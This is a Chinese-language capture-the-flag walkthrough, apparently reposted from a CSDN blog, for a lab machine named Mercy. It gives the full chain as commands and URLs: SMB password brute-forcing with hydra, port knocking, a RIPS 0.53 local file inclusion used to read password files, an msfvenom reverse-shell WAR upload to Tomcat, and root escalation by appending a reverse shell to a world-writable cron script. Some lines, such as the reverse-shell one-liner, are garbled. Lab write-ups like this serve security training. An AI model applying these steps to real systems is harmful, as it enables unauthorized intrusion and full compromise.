nmap扫下端口
nmap -sS -sV 192.168.8.144
发现22、80是关的,应该需要敲门
8080是tomcat页面,但是manager没密码控制台进不去,
提示主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在中定义。/etc/tomcat7/tomcat-users.xml
web暂时没发现线索,尝试攻击Samba
smbclient -NL 192.168.8.144 看一下共享名,发现存在qiu用户
爆破qiu的密码
hydra -l qiu -P /usr/share/wordlists/fasttrack.txt -e nsr smb://192.168.8.144
发现 密码为password
smbclient \\192.168.8.144\qiu -U qiu
发现config文件,get到本地
查看config中的配置,发现开80端口需要敲157、27391、4端口 。开20端口要敲17301、28504、9999
knock 192.168.8.144 159 27391 4 17301 28504 9999 用knock进行敲门打开80和22
dirb爆一下目录,发现robots文件得到mercy、nomercy两个目录
nomercy目录下是rips0.53的页面
再exploit-db里搜素rips0.53漏洞,发现存在本地文件包含漏洞
https://www.exploit-db.com/exploits/18660
成功包含passed
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/passwd
尝试包含一开始获取到的/tomcat-users.xml
http://192.168.8.144/nomercy/windows/code.php?file=…/…/…/…/…/…/etc/tomcat7/tomcat-users.xml
username=“thisisasuperduperlonguser” password="heartbreakisinevitable"成功登录tomcat控制台
上传个jsp马,需要提前打个war包,也可用msf生成一个
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.8.130 LPORT=7777 -f war -o shell.war
成功上传
tnmedxmp.jsp
监听端口
python生成交互shell:python -c ‘import pty;pty.spawn(“/bin/bash”)’
尝试su到fluffy用户
username=“fluffy” password=“freakishfluffybunny”
在/home/fluffy/.private/secrets下发现timeclock权限为777
发现可以同步时间,推测应该会周期执行
直接写个反弹shell进去,等一小会
echo “rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0/tmp/p” >>timeclock
root用户确实有timeclock的定时任务
来源地址:https://blog.csdn.net/weixin_47311099/article/details/127867461
